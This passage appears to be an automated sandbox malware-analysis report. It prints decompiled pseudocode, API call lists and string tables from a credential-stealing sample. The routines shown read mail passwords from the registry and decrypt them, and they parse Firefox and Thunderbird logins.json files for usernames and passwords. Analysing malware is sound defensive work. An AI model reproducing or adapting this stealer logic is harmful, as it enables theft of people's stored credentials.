                                      				_t226 = _t130;
                                      				if(_t130 == 0) {
                                      					E00401052( &_v17204, _t130, 0x1000);
                                      					E00409150( &_v9012,  &_v17204, _t226, _v8);
                                      					_t215 = _t215 + 0x10;
                                      					E004030C5( &_v16,  &_v17204,  &_v17204);
                                      				}
                                      				_v8 = 0x1000;
                                      				E00401052( &_v9012, 0, 0x1000);
                                      				_t216 = _t215 + 0xc;
                                      				_t136 = RegQueryValueExW(_t207, L"HTTP Password", 0, 0,  &_v9012,  &_v8);
                                      				_t227 = _t136;
                                      				if(_t136 == 0) {
                                      					E00401052( &_v17204, _t136, 0x1000);
                                      					E00409150( &_v9012,  &_v17204, _t227, _v8);
                                      					_t216 = _t216 + 0x10;
                                      					E004030C5( &_v16,  &_v17204,  &_v17204);
                                      				}
                                      				_v8 = 0x1000;
                                      				E00401052( &_v9012, 0, 0x1000);
                                      				_t217 = _t216 + 0xc;
                                      				_t142 = RegQueryValueExW(_t207, L"IMAP Password", 0, 0,  &_v9012,  &_v8);
                                      				_t228 = _t142;
                                      				if(_t142 == 0) {
                                      					E00401052( &_v17204, _t142, 0x1000);
                                      					E00409150( &_v9012,  &_v17204, _t228, _v8);
                                      					_t217 = _t217 + 0x10;
                                      					E004030C5( &_v16,  &_v17204,  &_v17204);
                                      				}
                                      				_v12 = 3;
                                      				if(E00403027( &_v24) > 0) {
                                      					E00401ED8(_t217 - 0x10,  &_v24);
                                      					E00401F0E(_t180);
                                      				}
                                      				E0040138F( &_v24);
                                      				return 1;
                                      			}































                                      0x00408db8
                                      0x00408db8
                                      0x00408dc0
                                      0x00408dca
                                      0x00408dd6
                                      0x00408de0
                                      0x00408de5
                                      0x00408de7
                                      0x00408dea
                                      0x00408df8
                                      0x00408e06
                                      0x00408e16
                                      0x00408e1b
                                      0x00408e21
                                      0x00408e3e
                                      0x00408e4a
                                      0x00408e4a
                                      0x00408e5a
                                      0x00408e64
                                      0x00408e69
                                      0x00408e85
                                      0x00408e91
                                      0x00408e91
                                      0x00408e9c
                                      0x00408ea8
                                      0x00408ead
                                      0x00408ec9
                                      0x00408ed5
                                      0x00408ed5
                                      0x00408ee0
                                      0x00408eec
                                      0x00408ef1
                                      0x00408f0d
                                      0x00408f19
                                      0x00408f19
                                      0x00408f24
                                      0x00408f30
                                      0x00408f35
                                      0x00408f51
                                      0x00408f5d
                                      0x00408f5d
                                      0x00408f68
                                      0x00408f74
                                      0x00408f79
                                      0x00408f91
                                      0x00408f93
                                      0x00408f95
                                      0x00408fa4
                                      0x00408fb8
                                      0x00408fbd
                                      0x00408fca
                                      0x00408fca
                                      0x00408fd5
                                      0x00408fe1
                                      0x00408fe6
                                      0x00408ffe
                                      0x00409000
                                      0x00409002
                                      0x00409011
                                      0x00409025
                                      0x0040902a
                                      0x00409037
                                      0x00409037
                                      0x00409042
                                      0x0040904e
                                      0x00409053
                                      0x0040906b
                                      0x0040906d
                                      0x0040906f
                                      0x0040907e
                                      0x00409092
                                      0x00409097
                                      0x004090a4
                                      0x004090a4
                                      0x004090af
                                      0x004090bb
                                      0x004090c0
                                      0x004090d8
                                      0x004090da
                                      0x004090dc
                                      0x004090eb
                                      0x004090ff
                                      0x00409104
                                      0x00409111
                                      0x00409111
                                      0x00409119
                                      0x00409127
                                      0x00409132
                                      0x00409139
                                      0x00409139
                                      0x00409141
                                      0x0040914d

                                      APIs
                                      • RegQueryValueExW.ADVAPI32(?,Account Name,00000000,00000000,?,00001000), ref: 00408E3A
                                      • RegQueryValueExW.ADVAPI32(?,Email,00000000,00000000,?,00001000), ref: 00408E81
                                      • RegQueryValueExW.ADVAPI32(?,POP3 Server,00000000,00000000,?,00001000), ref: 00408EC5
                                      • RegQueryValueExW.ADVAPI32(?,POP3 User,00000000,00000000,?,00001000), ref: 00408F09
                                      • RegQueryValueExW.ADVAPI32(?,SMTP Server,00000000,00000000,?,00001000), ref: 00408F4D
                                      • RegQueryValueExW.ADVAPI32(?,POP3 Password,00000000,00000000,?,00001000), ref: 00408F91
                                      • RegQueryValueExW.ADVAPI32(?,SMTP Password,00000000,00000000,?,00001000), ref: 00408FFE
                                      • RegQueryValueExW.ADVAPI32(?,HTTP Password,00000000,00000000,?,00001000), ref: 0040906B
                                      • RegQueryValueExW.ADVAPI32(?,IMAP Password,00000000,00000000,?,00001000), ref: 004090D8
                                        • Part of subcall function 00409150: GlobalAlloc.KERNEL32(00000040,-00000001,756645FD,?,?,?,00409104,00001000,?,00000000,00001000), ref: 0040916E
                                        • Part of subcall function 00409150: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,00409104), ref: 004091A4
                                        • Part of subcall function 00409150: lstrcpyW.KERNEL32(?,Could not decrypt), ref: 004091DB
                                        • Part of subcall function 00403027: lstrlenW.KERNEL32(?,0040340C,?,?,?,0040EE0E,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?,?,?,00000000), ref: 0040302E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: QueryValue$AllocCryptDataGlobalUnprotectlstrcpylstrlen
                                      • String ID: Account Name$Email$HTTP Password$IMAP Password$POP3 Password$POP3 Server$POP3 User$SMTP Password$SMTP Server
                                      • API String ID: 6593746-2537589853
                                      • Opcode ID: 51ed262c980c649d5f1f7c4d1e4fa5b07b3ad9ce00a28fa013fd44f0f5c6cf61
                                      • Instruction ID: a7ae0ff5eb382b3b678579d73a9e948d2059b91f5862e921ef1f80bd683fe3a0
                                      • Opcode Fuzzy Hash: 51ed262c980c649d5f1f7c4d1e4fa5b07b3ad9ce00a28fa013fd44f0f5c6cf61
                                      • Instruction Fuzzy Hash: 16A11EB291011DBADB25EBA1CD45FDF737CAF14744F1000BAB605F61C5EA78AB448BA8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 91%
                                      			E00409722(WCHAR* __ecx, void* __eflags, char _a4) {
                                      				int _v12;
                                      				int _v16;
                                      				WCHAR* _v20;
                                      				WCHAR* _v24;
                                      				char _v28;
                                      				WCHAR* _v32;
                                      				char _v36;
                                      				char _v40;
                                      				char _v44;
                                      				int _v48;
                                      				int _v52;
                                      				int _v56;
                                      				int _v60;
                                      				char _v64;
                                      				char _v68;
                                      				char _v72;
                                      				char _v76;
                                      				char _v80;
                                      				char _v84;
                                      				char _v88;
                                      				long _v92;
                                      				long _v96;
                                      				intOrPtr _v100;
                                      				char _v104;
                                      				char _v108;
                                      				char _v112;
                                      				void* _v116;
                                      				int _v120;
                                      				char _v124;
                                      				char _v128;
                                      				char _v132;
                                      				char _v136;
                                      				char _v140;
                                      				char _v144;
                                      				char _v148;
                                      				char _v152;
                                      				int _v156;
                                      				char _v160;
                                      				intOrPtr _v164;
                                      				char _v180;
                                      				char _v184;
                                      				short _v704;
                                      				short _v1224;
                                      				char* _t164;
                                      				void* _t166;
                                      				int _t191;
                                      				int _t192;
                                      				int _t195;
                                      				int _t209;
                                      				WCHAR* _t217;
                                      				void* _t219;
                                      				int _t223;
                                      				void* _t232;
                                      				void* _t238;
                                      				void* _t244;
                                      				int _t283;
                                      				int _t285;
                                      				char* _t291;
                                      				char* _t325;
                                      				void* _t386;
                                      				WCHAR* _t389;
                                      				intOrPtr _t391;
                                      				WCHAR* _t396;
                                      				int _t397;
                                      				void* _t398;
                                      				void* _t399;
                                      				void* _t400;
                                      
                                      				_t400 = __eflags;
                                      				_t389 = __ecx;
                                      				_v32 = __ecx;
                                      				E004033AB( &_v24, L"Profile");
                                      				_t283 = 0;
                                      				E00401052( &_v1224, 0, 0x208);
                                      				_v96 = 0;
                                      				_v92 = 0;
                                      				E00401052( &_v704, 0, 0x104);
                                      				_t399 = _t398 + 0x14;
                                      				_t385 =  &_v704;
                                      				E0040ABE2(L"firefox.exe",  &_v704, _t400);
                                      				_t291 =  &_v44;
                                      				E004033AB(_t291,  &_v704);
                                      				lstrcatW( &_v704, L"\\firefox.exe");
                                      				GetBinaryTypeW( &_v704,  &_v92);
                                      				_t401 = _v92 - 6;
                                      				_t164 =  &_v44;
                                      				if(_v92 != 6) {
                                      					_push(0);
                                      				} else {
                                      					_push(1);
                                      				}
                                      				_push(_t291);
                                      				E004033F3(_t399, _t164);
                                      				_t166 = E0040A50C(_t389, _t401);
                                      				_t402 = _t166;
                                      				if(_t166 == 0) {
                                      					_t393 = _v24;
                                      				} else {
                                      					E00403230( &_a4, _t385, _t402, L"\\Mozilla\\Firefox\\");
                                      					E004033F3( &_v36,  &_a4);
                                      					E00403230( &_v36, _t385, _t402, L"profiles.ini");
                                      					E004031FD( &_v24, E004033AB( &_v40, L"Profile"));
                                      					E004058FB(_v40);
                                      					E00403038( &_v24, _t385, _t402, _t283);
                                      					_push(_v36);
                                      					_push(0x104);
                                      					while(1) {
                                      						_t393 = _v24;
                                      						if(GetPrivateProfileStringW(_v24, L"Path", _t283,  &_v1224, ??, ??) == 0) {
                                      							break;
                                      						}
                                      						_v96 = _v96 + 1;
                                      						E004031FD( &_v24, E004033AB( &_v56, L"Profile"));
                                      						E004058FB(_v56);
                                      						_v56 = _t283;
                                      						E00403038( &_v24, _t385, __eflags, _v96 + 1);
                                      						E004033F3( &_v12,  &_a4);
                                      						E00403230( &_v12, _t385, __eflags,  &_v1224);
                                      						E0040331A( &_v12,  &_v28);
                                      						_t191 =  *((intOrPtr*)(_t389 + 0x60))(_v28);
                                      						__eflags = _t191;
                                      						if(_t191 == 0) {
                                      							_t192 =  *((intOrPtr*)(_t389 + 0x78))();
                                      							_v156 = _t192;
                                      							__eflags = _t192;
                                      							if(_t192 == 0) {
                                      								goto L7;
                                      							} else {
                                      								_t195 =  *((intOrPtr*)(_t389 + 0x74))(_t192, 1, _t283);
                                      								_t399 = _t399 + 0xc;
                                      								__eflags = _t195;
                                      								if(_t195 != 0) {
                                      									goto L7;
                                      								} else {
                                      									E004033F3( &_v20,  &_v12);
                                      									E00403230( &_v20, _t385, __eflags, L"\\logins.json");
                                      									_t386 = 0x1a;
                                      									E0040D51C( &_v16, _t386, __eflags);
                                      									E00403230( &_v16, _t386, __eflags, "\\");
                                      									_t385 = 8;
                                      									E004030FB( &_v16, __eflags, E0040326D( &_v60, _t385, __eflags));
                                      									E004058FB(_v60);
                                      									_v60 = _t283;
                                      									E00403230( &_v16, _t385, __eflags, L".tmp");
                                      									_t396 = _v16;
                                      									_t390 = _v20;
                                      									__eflags = CopyFileW(_v20, _t396, _t283);
                                      									if(__eflags != 0) {
                                      										E004031FD( &_v20,  &_v16);
                                      										_t390 = _v20;
                                      									}
                                      									E0040D9F6( &_v184, __eflags);
                                      									_t325 =  &_v180;
                                      									E004031FD(_t325,  &_v20);
                                      									_push(_t325);
                                      									_t209 = E0040DCBA( &_v184, 0xc0000000);
                                      									_t327 =  &_v184;
                                      									__eflags = _t209;
                                      									if(__eflags != 0) {
                                      										_v52 = _t283;
                                      										_v48 = _t283;
                                      										E0040D965( &_v184, _t385,  &_v52, _v164, _t283);
                                      										_t217 = E00403185( &_v116, "encryptedUsername");
                                      										_t219 = E00402CF2( &_v52,  &_v160);
                                      										_t385 = _t217;
                                      										_t285 = E004089D8(_t219, _t217, __eflags);
                                      										_v120 = _t285;
                                      										E004058FB(_v160);
                                      										_t336 = _v116;
                                      										E004058FB(_v116);
                                      										__eflags = _t285;
                                      										if(_t285 == 0) {
                                      											_t283 = 0;
                                      											__eflags = 0;
                                      										} else {
                                      											_t391 = _v32;
                                      											_t283 = 0;
                                      											__eflags = 0;
                                      											_t397 = _v120;
                                      											do {
                                      												_v112 = 0;
                                      												_v108 = 0;
                                      												_v104 = 0;
                                      												_t232 = E00403185( &_v128, "hostname");
                                      												E00408A11( &_v40, E00402CF2( &_v52,  &_v124), __eflags, _t232, _t397);
                                      												E004058FB(_v124);
                                      												E004058FB(_v128);
                                      												_t238 = E00403185( &_v136, "encryptedUsername");
                                      												E00408A11( &_v88, E00402CF2( &_v52,  &_v132), __eflags, _t238, _t397);
                                      												E004058FB(_v132);
                                      												E004058FB(_v136);
                                      												_t244 = E00403185( &_v144, "encryptedPassword");
                                      												_t385 = E00402CF2( &_v52,  &_v140);
                                      												E00408A11( &_v84, _t246, __eflags, _t244, _t397);
                                      												E004058FB(_v140);
                                      												E004058FB(_v144);
                                      												E00409C70(_t391, __eflags, _v88,  &_v76);
                                      												E00409C70(_t391, __eflags, _v84,  &_v80);
                                      												E004031FD( &_v112, E00402E63( &_v40, __eflags,  &_v64));
                                      												E004058FB(_v64);
                                      												_v64 = 0;
                                      												E004031FD( &_v108, E00402E63(E00403185( &_v148, _v76), __eflags,  &_v68));
                                      												E004058FB(_v68);
                                      												_v68 = 0;
                                      												E004058FB(_v148);
                                      												E004031FD( &_v104, E00402E63(E00403185( &_v152, _v80), __eflags,  &_v72));
                                      												E004058FB(_v72);
                                      												_v72 = 0;
                                      												E004058FB(_v152);
                                      												_t399 = _t399 - 0x10;
                                      												_v100 = 0;
                                      												E00401ED8(_t399,  &_v112);
                                      												E00401F0E(_t391);
                                      												E004058FB(_v76);
                                      												E004058FB(_v80);
                                      												E004058FB(_v84);
                                      												E004058FB(_v88);
                                      												E004058FB(_v40);
                                      												_t336 =  &_v112;
                                      												E0040138F( &_v112);
                                      												_t397 = _t397 - 1;
                                      												__eflags = _t397;
                                      											} while (_t397 != 0);
                                      											_t396 = _v16;
                                      											_t390 = _v20;
                                      										}
                                      										_t223 = PathFileExistsW(_t396);
                                      										__eflags = _t223;
                                      										if(_t223 != 0) {
                                      											E004033F3(_t399,  &_v16);
                                      											E0040DA33(_t336);
                                      										}
                                      										 *((intOrPtr*)(_v32 + 0x7c))(_v156);
                                      										 *((intOrPtr*)(_v32 + 0x64))();
                                      										E00402DFF( &_v52);
                                      										_t327 =  &_v184;
                                      									}
                                      									E0040DA15(_t327, __eflags);
                                      									E004058FB(_t396);
                                      									_v16 = _t283;
                                      									E004058FB(_t390);
                                      									_v20 = _t283;
                                      									E004058FB(_v28);
                                      									E004058FB(_v12);
                                      									_t389 = _v32;
                                      								}
                                      							}
                                      						} else {
                                      							L7:
                                      							E004058FB(_v28);
                                      							E004058FB(_v12);
                                      						}
                                      						_push(_v36);
                                      						_v12 = _t283;
                                      						_push(0x104);
                                      					}
                                      					E0040A4B5(_t389);
                                      					_t283 = 1;
                                      					E004058FB(_v36);
                                      				}
                                      				E004058FB(_v44);
                                      				E004058FB(_t393);
                                      				E004058FB(_a4);
                                      				return _t283;
                                      			}






































































                                      0x00409722
                                      0x0040972e
                                      0x00409738
                                      0x0040973b
                                      0x00409745
                                      0x0040974f
                                      0x00409759
                                      0x00409763
                                      0x00409768
                                      0x0040976d
                                      0x00409770
                                      0x0040977b
                                      0x00409788
                                      0x0040978b
                                      0x0040979c
                                      0x004097ad
                                      0x004097b3
                                      0x004097b7
                                      0x004097ba
                                      0x00409828
                                      0x004097bc
                                      0x004097bc
                                      0x004097bc
                                      0x004097be
                                      0x004097c2
                                      0x004097c9
                                      0x004097ce
                                      0x004097d0
                                      0x0040982b
                                      0x004097d2
                                      0x004097da
                                      0x004097e6
                                      0x004097f3
                                      0x00409809
                                      0x00409811
                                      0x0040981a
                                      0x0040981f
                                      0x00409822
                                      0x00409c1f
                                      0x00409c1f
                                      0x00409c38
                                      0x00000000
                                      0x00000000
                                      0x0040983f
                                      0x0040984b
                                      0x00409853
                                      0x0040985c
                                      0x0040985f
                                      0x0040986b
                                      0x0040987a
                                      0x00409886
                                      0x0040988e
                                      0x00409892
                                      0x00409894
                                      0x004098ab
                                      0x004098ae
                                      0x004098b4
                                      0x004098b6
                                      0x00000000
                                      0x004098b8
                                      0x004098bc
                                      0x004098bf
                                      0x004098c2
                                      0x004098c4
                                      0x00000000
                                      0x004098c6
                                      0x004098cd
                                      0x004098da
                                      0x004098e1
                                      0x004098e5
                                      0x004098f2
                                      0x004098f9
                                      0x00409906
                                      0x0040990e
                                      0x0040991b
                                      0x0040991e
                                      0x00409923
                                      0x00409926
                                      0x00409932
                                      0x00409934
                                      0x0040993d
                                      0x00409942
                                      0x00409942
                                      0x0040994b
                                      0x00409954
                                      0x0040995a
                                      0x0040995f
                                      0x0040996b
                                      0x00409970
                                      0x00409976
                                      0x00409978
                                      0x00409988
                                      0x0040998c
                                      0x0040998f
                                      0x0040999c
                                      0x004099ad
                                      0x004099b2
                                      0x004099c1
                                      0x004099c3
                                      0x004099c6
                                      0x004099cb
                                      0x004099ce
                                      0x004099d3
                                      0x004099d5
                                      0x00409ba8
                                      0x00409ba8
                                      0x004099db
                                      0x004099db
                                      0x004099de
                                      0x004099de
                                      0x004099e0
                                      0x004099e3
                                      0x004099ec
                                      0x004099ef
                                      0x004099f2
                                      0x004099f5
                                      0x00409a0c
                                      0x00409a16
                                      0x00409a1e
                                      0x00409a2f
                                      0x00409a46
                                      0x00409a50
                                      0x00409a5b
                                      0x00409a6c
                                      0x00409a81
                                      0x00409a86
                                      0x00409a93
                                      0x00409a9e
                                      0x00409aac
                                      0x00409aba
                                      0x00409acf
                                      0x00409ad7
                                      0x00409adf
                                      0x00409afc
                                      0x00409b04
                                      0x00409b0f
                                      0x00409b12
                                      0x00409b34
                                      0x00409b3c
                                      0x00409b47
                                      0x00409b4a
                                      0x00409b4f
                                      0x00409b52
                                      0x00409b5b
                                      0x00409b62
                                      0x00409b6a
                                      0x00409b72
                                      0x00409b7a
                                      0x00409b82
                                      0x00409b8a
                                      0x00409b8f
                                      0x00409b92
                                      0x00409b97
                                      0x00409b97
                                      0x00409b97
                                      0x00409ba0
                                      0x00409ba3
                                      0x00409ba3
                                      0x00409bab
                                      0x00409bb1
                                      0x00409bb3
                                      0x00409bbc
                                      0x00409bc1
                                      0x00409bc6
                                      0x00409bd0
                                      0x00409bd7
                                      0x00409bdd
                                      0x00409be2
                                      0x00409be2
                                      0x00409be8
                                      0x00409bef
                                      0x00409bf6
                                      0x00409bf9
                                      0x00409c01
                                      0x00409c04
                                      0x00409c0c
                                      0x00409c11
                                      0x00409c11
                                      0x004098c4
                                      0x00409896
                                      0x00409896
                                      0x00409899
                                      0x004098a1
                                      0x004098a1
                                      0x00409c14
                                      0x00409c17
                                      0x00409c1a
                                      0x00409c1a
                                      0x00409c40
                                      0x00409c4a
                                      0x00409c4b
                                      0x00409c4b
                                      0x00409c53
                                      0x00409c5a
                                      0x00409c62
                                      0x00409c6d

                                      APIs
                                        • Part of subcall function 004033AB: lstrlenW.KERNEL32(0040F5B0,00000000,?,0040F5B0,00000000,?,00000000), ref: 004033B4
                                        • Part of subcall function 004033AB: lstrlenW.KERNEL32(0040F5B0,?,0040F5B0,00000000,?,00000000), ref: 004033CB
                                        • Part of subcall function 004033AB: lstrcpyW.KERNEL32(?,0040F5B0), ref: 004033E6
                                        • Part of subcall function 0040ABE2: lstrcpyW.KERNEL32(?,Software\Microsoft\Windows\CurrentVersion\App Paths\), ref: 0040AC1E
                                        • Part of subcall function 0040ABE2: lstrcatW.KERNEL32 ref: 0040AC2C
                                        • Part of subcall function 0040ABE2: RegOpenKeyExW.ADVAPI32 ref: 0040AC45
                                        • Part of subcall function 0040ABE2: RegQueryValueExW.ADVAPI32(00409247,Path,00000000,?,?,?), ref: 0040AC62
                                        • Part of subcall function 0040ABE2: RegCloseKey.ADVAPI32(00409247), ref: 0040AC6B
                                      • lstrcatW.KERNEL32 ref: 0040979C
                                      • GetBinaryTypeW.KERNEL32 ref: 004097AD
                                      • GetPrivateProfileStringW.KERNEL32(?,Path,00000000,?,00000104,?), ref: 00409C30
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcatlstrcpylstrlen$BinaryCloseOpenPrivateProfileQueryStringTypeValue
                                      • String ID: .tmp$Path$Profile$\Mozilla\Firefox\$\firefox.exe$\logins.json$encryptedPassword$encryptedUsername$firefox.exe$hostname$profiles.ini
                                      • API String ID: 201373641-815594582
                                      • Opcode ID: 0e62d5b8abd91c5793417efa9fb2dcffee6423e4b2c4e79af15117f7129e08b6
                                      • Instruction ID: 0d55a3f652f2fe1f99315aa1a92d08475ee962f08214b0b1392dd0f18bd33d50
                                      • Opcode Fuzzy Hash: 0e62d5b8abd91c5793417efa9fb2dcffee6423e4b2c4e79af15117f7129e08b6
                                      • Instruction Fuzzy Hash: E2E1D772E00219ABCB04EBA1DD929EEB779EF48305F10407EE406B71D2DE786E45DB58
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 94%
                                      			E004091E6(intOrPtr __ecx, void* __eflags, char _a4) {
                                      				int _v12;
                                      				int _v16;
                                      				WCHAR* _v20;
                                      				WCHAR* _v24;
                                      				char _v28;
                                      				intOrPtr _v32;
                                      				char _v36;
                                      				char _v40;
                                      				char _v44;
                                      				int _v48;
                                      				int _v52;
                                      				long _v56;
                                      				int _v60;
                                      				int _v64;
                                      				char _v68;
                                      				char _v72;
                                      				char _v76;
                                      				char _v80;
                                      				char _v84;
                                      				intOrPtr _v88;
                                      				char _v92;
                                      				char _v96;
                                      				char _v100;
                                      				void* _v104;
                                      				int _v108;
                                      				char _v112;
                                      				char _v116;
                                      				char _v120;
                                      				char _v124;
                                      				char _v128;
                                      				char _v132;
                                      				char _v136;
                                      				char _v140;
                                      				char _v144;
                                      				char _v148;
                                      				int _v152;
                                      				long _v156;
                                      				char _v160;
                                      				intOrPtr _v164;
                                      				char _v180;
                                      				char _v184;
                                      				short _v704;
                                      				short _v1224;
                                      				long _t171;
                                      				int _t182;
                                      				int _t183;
                                      				int _t186;
                                      				int _t200;
                                      				WCHAR* _t208;
                                      				void* _t210;
                                      				int _t214;
                                      				void* _t223;
                                      				void* _t229;
                                      				void* _t235;
                                      				int _t279;
                                      				int _t281;
                                      				char* _t321;
                                      				void* _t382;
                                      				intOrPtr _t385;
                                      				intOrPtr _t387;
                                      				WCHAR* _t392;
                                      				int _t393;
                                      				void* _t394;
                                      				void* _t395;
                                      				void* _t396;
                                      
                                      				_t396 = __eflags;
                                      				_t385 = __ecx;
                                      				_v32 = __ecx;
                                      				E004033AB( &_v24, L"Profile");
                                      				_t279 = 0;
                                      				E00401052( &_v1224, 0, 0x208);
                                      				_v56 = 0;
                                      				_v156 = 0;
                                      				E00401052( &_v704, 0, 0x104);
                                      				_t395 = _t394 + 0x14;
                                      				_t381 =  &_v704;
                                      				E0040ABE2(L"thunderbird.exe",  &_v704, _t396);
                                      				E004033AB( &_v44,  &_v704);
                                      				GetBinaryTypeW( &_v704,  &_v156);
                                      				E004033F3(_t395,  &_v44);
                                      				_t289 = _t385;
                                      				if(E0040A190(_t385,  &_v704,  &_v44) != 0) {
                                      					L3:
                                      					E00403230( &_a4, _t381, __eflags, L"\\Thunderbird\\");
                                      					E004033F3( &_v36,  &_a4);
                                      					E00403230( &_v36, _t381, __eflags, L"profiles.ini");
                                      					E004031FD( &_v24, E004033AB( &_v40, L"Profile"));
                                      					E004058FB(_v40);
                                      					E00403038( &_v24, _t381, __eflags, _t279);
                                      					_push(_v36);
                                      					_push(0x104);
                                      					while(1) {
                                      						_t389 = _v24;
                                      						_t171 = GetPrivateProfileStringW(_v24, L"Path", _t279,  &_v1224, ??, ??);
                                      						__eflags = _t171;
                                      						if(_t171 == 0) {
                                      							break;
                                      						}
                                      						_v56 = _v56 + 1;
                                      						E004031FD( &_v24, E004033AB( &_v60, L"Profile"));
                                      						E004058FB(_v60);
                                      						_v60 = _t279;
                                      						E00403038( &_v24, _t381, __eflags, _v56 + 1);
                                      						E004033F3( &_v12,  &_a4);
                                      						E00403230( &_v12, _t381, __eflags,  &_v1224);
                                      						E0040331A( &_v12,  &_v28);
                                      						_t182 =  *((intOrPtr*)(_t385 + 0x60))(_v28);
                                      						__eflags = _t182;
                                      						if(_t182 == 0) {
                                      							_t183 =  *((intOrPtr*)(_t385 + 0x78))();
                                      							_v152 = _t183;
                                      							__eflags = _t183;
                                      							if(_t183 == 0) {
                                      								goto L5;
                                      							} else {
                                      								_t186 =  *((intOrPtr*)(_t385 + 0x74))(_t183, 1, _t279);
                                      								_t395 = _t395 + 0xc;
                                      								__eflags = _t186;
                                      								if(_t186 != 0) {
                                      									goto L5;
                                      								} else {
                                      									E004033F3( &_v20,  &_v12);
                                      									E00403230( &_v20, _t381, __eflags, L"\\logins.json");
                                      									_t382 = 0x1a;
                                      									E0040D51C( &_v16, _t382, __eflags);
                                      									E00403230( &_v16, _t382, __eflags, "\\");
                                      									_t381 = 8;
                                      									E004030FB( &_v16, __eflags, E0040326D( &_v64, _t381, __eflags));
                                      									E004058FB(_v64);
                                      									_v64 = _t279;
                                      									E00403230( &_v16, _t381, __eflags, L".tmp");
                                      									_t392 = _v16;
                                      									_t386 = _v20;
                                      									__eflags = CopyFileW(_v20, _t392, _t279);
                                      									if(__eflags != 0) {
                                      										E004031FD( &_v20,  &_v16);
                                      										_t386 = _v20;
                                      									}
                                      									E0040D9F6( &_v184, __eflags);
                                      									_t321 =  &_v180;
                                      									E004031FD(_t321,  &_v20);
                                      									_push(_t321);
                                      									_t200 = E0040DCBA( &_v184, 0xc0000000);
                                      									_t323 =  &_v184;
                                      									__eflags = _t200;
                                      									if(__eflags != 0) {
                                      										_v52 = _t279;
                                      										_v48 = _t279;
                                      										E0040D965( &_v184, _t381,  &_v52, _v164, _t279);
                                      										_t208 = E00403185( &_v104, "encryptedUsername");
                                      										_t210 = E00402CF2( &_v52,  &_v160);
                                      										_t381 = _t208;
                                      										_t281 = E004089D8(_t210, _t208, __eflags);
                                      										_v108 = _t281;
                                      										E004058FB(_v160);
                                      										_t332 = _v104;
                                      										E004058FB(_v104);
                                      										__eflags = _t281;
                                      										if(_t281 == 0) {
                                      											_t279 = 0;
                                      											__eflags = 0;
                                      										} else {
                                      											_t387 = _v32;
                                      											_t279 = 0;
                                      											__eflags = 0;
                                      											_t393 = _v108;
                                      											do {
                                      												_v100 = 0;
                                      												_v96 = 0;
                                      												_v92 = 0;
                                      												_t223 = E00403185( &_v116, "hostname");
                                      												E00408A11( &_v40, E00402CF2( &_v52,  &_v112), __eflags, _t223, _t393);
                                      												E004058FB(_v112);
                                      												E004058FB(_v116);
                                      												_t229 = E00403185( &_v124, "encryptedUsername");
                                      												E00408A11( &_v84, E00402CF2( &_v52,  &_v120), __eflags, _t229, _t393);
                                      												E004058FB(_v120);
                                      												E004058FB(_v124);
                                      												_t235 = E00403185( &_v132, "encryptedPassword");
                                      												_t381 = E00402CF2( &_v52,  &_v128);
                                      												E00408A11( &_v80, _t237, __eflags, _t235, _t393);
                                      												E004058FB(_v128);
                                      												E004058FB(_v132);
                                      												E00409C70(_t387, __eflags, _v84,  &_v136);
                                      												E00409C70(_t387, __eflags, _v80,  &_v144);
                                      												E004031FD( &_v100, E00402E63( &_v40, __eflags,  &_v68));
                                      												E004058FB(_v68);
                                      												_v68 = 0;
                                      												E004031FD( &_v96, E00402E63(E00403185( &_v140, _v136), __eflags,  &_v72));
                                      												E004058FB(_v72);
                                      												_v72 = 0;
                                      												E004058FB(_v140);
                                      												E004031FD( &_v92, E00402E63(E00403185( &_v148, _v144), __eflags,  &_v76));
                                      												E004058FB(_v76);
                                      												_v76 = 0;
                                      												E004058FB(_v148);
                                      												_t395 = _t395 - 0x10;
                                      												_v88 = 4;
                                      												E00401ED8(_t395,  &_v100);
                                      												E00401F0E(_t387);
                                      												E004058FB(_v80);
                                      												E004058FB(_v84);
                                      												E004058FB(_v40);
                                      												_t332 =  &_v100;
                                      												E0040138F( &_v100);
                                      												_t393 = _t393 - 1;
                                      												__eflags = _t393;
                                      											} while (_t393 != 0);
                                      											_t392 = _v16;
                                      											_t386 = _v20;
                                      										}
                                      										_t214 = PathFileExistsW(_t392);
                                      										__eflags = _t214;
                                      										if(_t214 != 0) {
                                      											E004033F3(_t395,  &_v16);
                                      											E0040DA33(_t332);
                                      										}
                                      										 *((intOrPtr*)(_v32 + 0x7c))(_v152);
                                      										 *((intOrPtr*)(_v32 + 0x64))();
                                      										E00402DFF( &_v52);
                                      										_t323 =  &_v184;
                                      									}
                                      									E0040DA15(_t323, __eflags);
                                      									E004058FB(_t392);
                                      									_v16 = _t279;
                                      									E004058FB(_t386);
                                      									_v20 = _t279;
                                      									E004058FB(_v28);
                                      									E004058FB(_v12);
                                      									_t385 = _v32;
                                      								}
                                      							}
                                      						} else {
                                      							L5:
                                      							E004058FB(_v28);
                                      							E004058FB(_v12);
                                      						}
                                      						_push(_v36);
                                      						_v12 = _t279;
                                      						_push(0x104);
                                      					}
                                      					E0040A139(_t385);
                                      					_t279 = 1;
                                      					__eflags = 1;
                                      					E004058FB(_v36);
                                      				} else {
                                      					E004033F3(_t395,  &_v44);
                                      					if(E0040A190(_t385,  &_v704, _t289) != 0) {
                                      						goto L3;
                                      					} else {
                                      						_t389 = _v24;
                                      					}
                                      				}
                                      				E004058FB(_v44);
                                      				E004058FB(_t389);
                                      				E004058FB(_a4);
                                      				return _t279;
                                      			}




































































                                      0x004091e6
                                      0x004091f2
                                      0x004091fc
                                      0x004091ff
                                      0x00409209
                                      0x00409213
                                      0x0040921d
                                      0x00409227
                                      0x0040922f
                                      0x00409234
                                      0x00409237
                                      0x00409242
                                      0x00409252
                                      0x00409265
                                      0x00409272
                                      0x00409277
                                      0x00409280
                                      0x004092a1
                                      0x004092a9
                                      0x004092b5
